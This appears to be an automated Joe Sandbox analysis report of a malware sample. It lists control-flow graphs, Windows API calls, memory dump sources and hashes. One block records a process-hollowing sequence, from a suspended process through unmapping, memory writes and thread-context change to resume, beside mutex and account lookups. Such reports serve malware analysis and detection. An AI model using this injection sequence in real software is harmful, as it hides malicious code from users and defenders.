                                                                        control_flow_graph 480 10bc59c-10bc5b2 481 10bc5b8-10bc5d8 480->481 482 10bc6bd 480->482 484 10bc67b-10bc6bb call 10ba831 * 4 481->484 485 10bc5de-10bc5ea 481->485 483 10bc6c0-10bc6c4 482->483 484->483 487 10bc5ee-10bc5f3 485->487 488 10bc5ec 485->488 489 10bc5f8-10bc5fa 487->489 490 10bc5f5-10bc5f7 487->490 488->487 492 10bc619-10bc637 call 10c0e41 call 10bd653 489->492 493 10bc5fc-10bc600 call 10c0e41 489->493 490->489 492->482 507 10bc63d-10bc667 492->507 498 10bc605-10bc617 call 10bd653 493->498 498->492 498->507 507->484 509 10bc669-10bc66c 507->509 510 10bc66e-10bc676 509->510 510->510 511 10bc678 510->511 511->484
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: 4c789c6995f40b0a99d1693125dd911beb16006696065cf702f5582db04d6325
                                                                        • Instruction ID: add069c3004cb9737c17b97a4edd6d39546c052fe8370ee04067ba6b3188238b
                                                                        • Opcode Fuzzy Hash: 4c789c6995f40b0a99d1693125dd911beb16006696065cf702f5582db04d6325
                                                                        • Instruction Fuzzy Hash: 3B41A236A002049BDB25DFA8C9C0ADEB7F5EF89B14B1544A9E995EB341D731ED02CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 512 10c4d8f-10c4d9a 513 10c4d9c-10c4da5 call 10bdb3c 512->513 514 10c4da7-10c4dad 512->514 523 10c4dcb-10c4dcd 513->523 516 10c4daf-10c4db6 call 10bd653 514->516 517 10c4db8-10c4dbb 514->517 530 10c4dc8 516->530 518 10c4dbd-10c4dc2 call 10bb7f0 517->518 519 10c4de2-10c4df4 RtlReAllocateHeap 517->519 518->530 524 10c4dce-10c4dd5 call 10bccd1 519->524 525 10c4df6 519->525 524->518 532 10c4dd7-10c4de0 call 10bbd47 524->532 529 10c4dca 525->529 529->523 530->529 532->518 532->519
                                                                        APIs
                                                                        • _free.LIBCMT ref: 010C4DB0
                                                                          • Part of subcall function 010BDB3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,010B8272,?,?,?,?,?,010A20C3,?,?), ref: 010BDB6E
                                                                        • RtlReAllocateHeap.NTDLL(00000000,?,?,00000004,00000000,?,010C0E8A,?,00000004,00000002,?,?,?,010BC625,?,00000002), ref: 010C4DEC
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap$_free
                                                                        • String ID:
                                                                        • API String ID: 1482568997-0
                                                                        • Opcode ID: 2a2aca3aaf329a0a7a792393abb306a3be5a51c01a23730b5e95ff6bb48819bb
                                                                        • Instruction ID: e9b7500868d93a350bac9bf1f903cfbe892e0c9bb7f9c269bee474d5620a9d49
                                                                        • Opcode Fuzzy Hash: 2a2aca3aaf329a0a7a792393abb306a3be5a51c01a23730b5e95ff6bb48819bb
                                                                        • Instruction Fuzzy Hash: 52F0C2312402166B9B223B2AAC50FEF3B98BF91E70B11026DFDD4DA280DB20C440CAA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 535 10b5e20-10b5e3c 536 10b5e3e-10b5e43 535->536 537 10b5e64-10b5e6a 535->537 538 10b5e47-10b5e61 call 10b9bb0 536->538 539 10b5e45 536->539 540 10b5f4e call 10b69f0 537->540 541 10b5e70-10b5e7b 537->541 539->538 547 10b5f53-10b5f58 call 10a2150 540->547 544 10b5e7d-10b5e82 541->544 545 10b5e84-10b5e91 541->545 548 10b5ea2-10b5eb6 544->548 549 10b5e9a-10b5e9f 545->549 550 10b5e93-10b5e98 545->550 552 10b5eb8-10b5ebd 548->552 553 10b5edd-10b5edf 548->553 549->548 550->548 552->547 557 10b5ec3-10b5ed0 call 10b7403 552->557 554 10b5eec 553->554 555 10b5ee1-10b5ee2 call 10b7403 553->555 559 10b5eee-10b5f11 call 10ba270 554->559 561 10b5ee7-10b5eea 555->561 564 10b5f49 call 10bbcdc 557->564 565 10b5ed2-10b5edb 557->565 568 10b5f3c-10b5f46 559->568 569 10b5f13-10b5f1e 559->569 561->559 564->540 565->559 570 10b5f32-10b5f39 call 10b7684 569->570 571 10b5f20-10b5f2e 569->571 570->568 571->564 572 10b5f30 571->572 572->570
                                                                        APIs
                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 010B5F53
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Concurrency::cancel_current_task
                                                                        • String ID:
                                                                        • API String ID: 118556049-0
                                                                        • Opcode ID: 99a60c00e11d80a0fe42efdd695636690d312d340402f51b068320ab2a9b3208
                                                                        • Instruction ID: 5e9d0b50bd5b72d759fe1e214160451731f4e53cc8b44f1824e61b96b2b05104
                                                                        • Opcode Fuzzy Hash: 99a60c00e11d80a0fe42efdd695636690d312d340402f51b068320ab2a9b3208
                                                                        • Instruction Fuzzy Hash: B731F6717002019BD7189E7C9CC05EEFBE9EB55320B1443BEE9A5C7381D7709D448752
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 010A218E
                                                                          • Part of subcall function 010B8483: RaiseException.KERNEL32(E06D7363,00000001,00000003,010A216C,?,?,?,010A216C,?,010D6D1C), ref: 010B84E3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExceptionRaise___std_exception_copy
                                                                        • String ID:
                                                                        • API String ID: 3109751735-0
                                                                        • Opcode ID: 3be86983fbe447236edda2a052303c6a023b0b3ba269d88372f5bcb4268513fb
                                                                        • Instruction ID: 45febd560439d9a1bb2024e573fdb301ae14ef971a448772e47e6c07956a9c7e
                                                                        • Opcode Fuzzy Hash: 3be86983fbe447236edda2a052303c6a023b0b3ba269d88372f5bcb4268513fb
                                                                        • Instruction Fuzzy Hash: DE01D67580030E67CB14FBE8EC809DDBBAC9E24110B508576FA94AA590FF74E55486D1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 597 10bd4b1-10bd4d7 call 10bd287 600 10bd4d9-10bd4eb call 10c268f 597->600 601 10bd530-10bd533 597->601 603 10bd4f0-10bd4f5 600->603 603->601 604 10bd4f7-10bd52f 603->604
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __wsopen_s
                                                                        • String ID:
                                                                        • API String ID: 3347428461-0
                                                                        • Opcode ID: 8e5cb70d91ee43c71b8f501c53143b0094c83c0b74f9bf6b0e766de155b6fe42
                                                                        • Instruction ID: 7d64d87d8e339fbd5862ff6eafbe599454b3e2b061f42aa1c49926c466f8439a
                                                                        • Opcode Fuzzy Hash: 8e5cb70d91ee43c71b8f501c53143b0094c83c0b74f9bf6b0e766de155b6fe42
                                                                        • Instruction Fuzzy Hash: 73112A71A0420AAFCF05DF98E9409DF7BF4EF48318F0540A9F809EB251E671EA11CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 605 10bed56-10bed63 call 10bf925 607 10bed68-10bed73 605->607 608 10bed79-10bed81 607->608 609 10bed75-10bed77 607->609 610 10bedc4-10bedd0 call 10bd653 608->610 611 10bed83-10bed87 608->611 609->610 612 10bed89-10bedbe call 10be503 611->612 617 10bedc0-10bedc3 612->617 617->610
                                                                        APIs
                                                                          • Part of subcall function 010BF925: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,010BE0E6,00000001,00000364,00000006,000000FF,?,?,010B8272,?), ref: 010BF966
                                                                        • _free.LIBCMT ref: 010BEDC5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap_free
                                                                        • String ID:
                                                                        • API String ID: 614378929-0
                                                                        • Opcode ID: bbfaf170cd2aa4a5dd4654b786cba334a1d7a93fa1ef5963fa5f0812df2330b2
                                                                        • Instruction ID: 9934409c5914ff24605f8765a7216b99775fd595caeffac18638ba5adc355522
                                                                        • Opcode Fuzzy Hash: bbfaf170cd2aa4a5dd4654b786cba334a1d7a93fa1ef5963fa5f0812df2330b2
                                                                        • Instruction Fuzzy Hash: 7201F972604317ABC3219F9DD8C4ADEFBD8EB053B0F15066AE595A76C0E7B06910C7A4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 618 10c2621-10c2655 call 10badd0 call 10bad30 623 10c265c-10c2671 call 10c26af 618->623 624 10c2657-10c265a 618->624 629 10c2676-10c2679 623->629 625 10c267b-10c267f 624->625 627 10c268a-10c268e 625->627 628 10c2681-10c2689 call 10bd653 625->628 628->627 629->625
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: 6d7cabbe3305cb9b6d011bf0e9d56addc9b4860a8407226052aa3c61f76cc774
                                                                        • Instruction ID: 30e6725a709c00c4e7141b270e992022222ef69c2e78f40e185473489d96acb0
                                                                        • Opcode Fuzzy Hash: 6d7cabbe3305cb9b6d011bf0e9d56addc9b4860a8407226052aa3c61f76cc774
                                                                        • Instruction Fuzzy Hash: 0F014F72C0015EBFCF01AFA89C00AEE7FF5AF18214F144569E955E2190E6318A60DF95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 632 10bf925-10bf930 633 10bf93e-10bf944 632->633 634 10bf932-10bf93c 632->634 636 10bf95d-10bf96e RtlAllocateHeap 633->636 637 10bf946-10bf947 633->637 634->633 635 10bf972-10bf97d call 10bb7f0 634->635 642 10bf97f-10bf981 635->642 638 10bf949-10bf950 call 10bccd1 636->638 639 10bf970 636->639 637->636 638->635 645 10bf952-10bf95b call 10bbd47 638->645 639->642 645->635 645->636
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,010BE0E6,00000001,00000364,00000006,000000FF,?,?,010B8272,?), ref: 010BF966
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 2a33a97d9cf3e97cf741c2db1c7bcd579af8d9485345aa1c706e447110413de2
                                                                        • Instruction ID: 9a428bd56fc84ea21f2f0dfb25483ec017945044c3f31400757ae605d5f2d876
                                                                        • Opcode Fuzzy Hash: 2a33a97d9cf3e97cf741c2db1c7bcd579af8d9485345aa1c706e447110413de2
                                                                        • Instruction Fuzzy Hash: 19F08931665327B7AB627A3A9CC4BDB3B99AF617B0B148161EDD5D7284CB30DC0187E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,010B8272,?,?,?,?,?,010A20C3,?,?), ref: 010BDB6E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: b91df49410417f9be29c0e8b0ad3592083371b7712393691a93128069297dbc7
                                                                        • Instruction ID: 29006c3d79faa666eb62a651513cb855e1d197de80c5f7c149f682a421e4a1b7
                                                                        • Opcode Fuzzy Hash: b91df49410417f9be29c0e8b0ad3592083371b7712393691a93128069297dbc7
                                                                        • Instruction Fuzzy Hash: D1E0E531140212E7EA7126F99C80FDAFEC8AB513B8F040060EDD597280CB24C80083E9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(00000000,00000000,?,010C2758,?,?,00000000,?,010C2758,00000000,0000000C), ref: 010C2385
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: abcc45b2a00496743f05c577563d3ca391fc4193dcb00d7c407017f80dd55bbf
                                                                        • Instruction ID: 40e04954ba0217f32e07e94cfa0980fe70b9ecc6974ec9d10b5617a415090ce1
                                                                        • Opcode Fuzzy Hash: abcc45b2a00496743f05c577563d3ca391fc4193dcb00d7c407017f80dd55bbf
                                                                        • Instruction Fuzzy Hash: 4ED06C3200014DBFDF128F85DD46EDA3FAAFB88714F014000BE5856020C736E831AB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 010A38E6
                                                                        • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 010A394B
                                                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 010A3964
                                                                        • GetThreadContext.KERNEL32(?,00000000), ref: 010A397F
                                                                        • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 010A39A3
                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 010A39BE
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 010A39C5
                                                                        • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 010A39ED
                                                                        • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 010A3A0E
                                                                        • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 010A3A5A
                                                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000), ref: 010A3A96
                                                                        • SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 010A3AB2
                                                                        • ResumeThread.KERNEL32(?,?,?,00000000), ref: 010A3ABE
                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 010A3ACC
                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 010A3AED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                                                        • String ID: $NtUnmapViewOfSection$ntdll.dll
                                                                        • API String ID: 4033543172-1522589568
                                                                        • Opcode ID: 44b50a08cc3faeb878059016370a8483c17c8a4c6fe0dad10c6ab467103edee9
                                                                        • Instruction ID: 9858a7caa7a620d59d844fc0f69277194808cecb3db73dcd92f75f3fa1f43079
                                                                        • Opcode Fuzzy Hash: 44b50a08cc3faeb878059016370a8483c17c8a4c6fe0dad10c6ab467103edee9
                                                                        • Instruction Fuzzy Hash: 39B1A471A00218EFDB21CF68DC45BEABBB5FF44714F504199F585AA2C0D776A980CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateMutexW.KERNEL32(00000000,00000000,?,010D918C,C73353B8,?,00000000,00000000), ref: 010A7F61
                                                                        • GetLastError.KERNEL32(?,00000000,00000000), ref: 010A7F67
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateErrorLastMutex
                                                                        • String ID:
                                                                        • API String ID: 1925916568-0
                                                                        • Opcode ID: e67f192b95928e37f1e92f518554146f96f5176673957ed5a24562dadbb85cab
                                                                        • Instruction ID: 32f50b147a15ba284e55b20966ccd898d7792c9338bd19c7e0c2cc609640cf85
                                                                        • Opcode Fuzzy Hash: e67f192b95928e37f1e92f518554146f96f5176673957ed5a24562dadbb85cab
                                                                        • Instruction Fuzzy Hash: 67227971A001089FEB18DFA8CC88BDDBF76EF84311F948169E585AB2D4DB359A80CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$InformationTimeZone
                                                                        • String ID:
                                                                        • API String ID: 597776487-0
                                                                        • Opcode ID: af2e525b271ddb26eb251dd94eb320f798a0faeaaefa400e66ac8bd7bd25b68e
                                                                        • Instruction ID: a8c40dbc440026b102a669a2b3cc07f1ecfb9b9401fe7eb899b0e38e2ec5d183
                                                                        • Opcode Fuzzy Hash: af2e525b271ddb26eb251dd94eb320f798a0faeaaefa400e66ac8bd7bd25b68e
                                                                        • Instruction Fuzzy Hash: 28C12575A10206AFDB21AB7CD890AEEBBF9BF55B50F14809DE5C0DB281E7358A01CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 010B7B12
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FeaturePresentProcessor
                                                                        • String ID:
                                                                        • API String ID: 2325560087-0
                                                                        • Opcode ID: 2acd6d7114fa9803da759293a8e6672b7642f66098d13edab777f3f51e96d17f
                                                                        • Instruction ID: 6e74819554a17571b6f240590434276ca2c750a8d6bac4a98989bab26966179a
                                                                        • Opcode Fuzzy Hash: 2acd6d7114fa9803da759293a8e6672b7642f66098d13edab777f3f51e96d17f
                                                                        • Instruction Fuzzy Hash: 5A515372901219CBEB65CF69D4C579ABBF0FB48314F14896ED986E7384D3799900CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 38dd18e236bff778ebfac104873e99183c47078571e48966eb6fb82665c9afe8
                                                                        • Instruction ID: 1cda36f5d22e05eb26ce2446e1c1cbac1de0e0baf20c96483ffad562d2cdd90e
                                                                        • Opcode Fuzzy Hash: 38dd18e236bff778ebfac104873e99183c47078571e48966eb6fb82665c9afe8
                                                                        • Instruction Fuzzy Hash: D9E08C72911229EBCB14DB8CCA849CAF7FCEB48A40B1540A6B602D3240C270DE00C7D0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetUserNameW.ADVAPI32(00000000,?), ref: 010A3132
                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 010A3147
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 010A314A
                                                                        • GetUserNameW.ADVAPI32(00000000,?), ref: 010A3158
                                                                        • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 010A317B
                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 010A3186
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 010A3189
